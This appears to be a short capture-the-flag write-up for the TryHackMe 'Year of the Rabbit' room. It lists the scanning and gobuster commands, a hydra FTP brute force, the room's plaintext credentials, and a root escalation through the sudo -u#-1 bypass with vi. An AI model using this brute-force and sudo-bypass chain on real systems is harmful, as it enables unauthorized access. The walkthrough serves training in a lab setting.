Year of the Rabbit
Room Link: https://tryhackme.com/room/yearoftherabbit
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found.
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMTCP/80 - HTTP
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
Turn off Javascript
Enter about:config into the search bar and select Accept the Risk and Continue.
Enter javascript.enabled into the search box at the top of the page.
Select the javascript.enabled toggle to change the value to false.
Kali
strings Hot_Babe.png 
Kali
hydra -l ftpuser -P passwords.txt ftp://$VICTIM
FTP
Kali
ftp $VICTIM
password: 5iez1wGXKfPKQ
Elis creds is encoded with something called Brain fuck. There are tools online to decode it.
Link: https://www.dcode.fr/brainfuck-language
Kali
ssh eli@$VICTIM
Password: DSpDiM1wAEwid
Victim
locate s3cr3t
cat cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\! 
Victim
su gwendoline
Password: MniVCQVhQHUNI
Privilege escalation
Mostly followed the link below, we can't run sudo with root as we have (ALL , !root) here. if we had (ALL , ALL) it would be easy to escalate. Adding sudo -u#-1 to infront of the command allows us to bypass this.
Link: https://www.exploit-db.com/exploits/47502
Victim
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
#While vi is open run:
:!/bin/sh
Last updated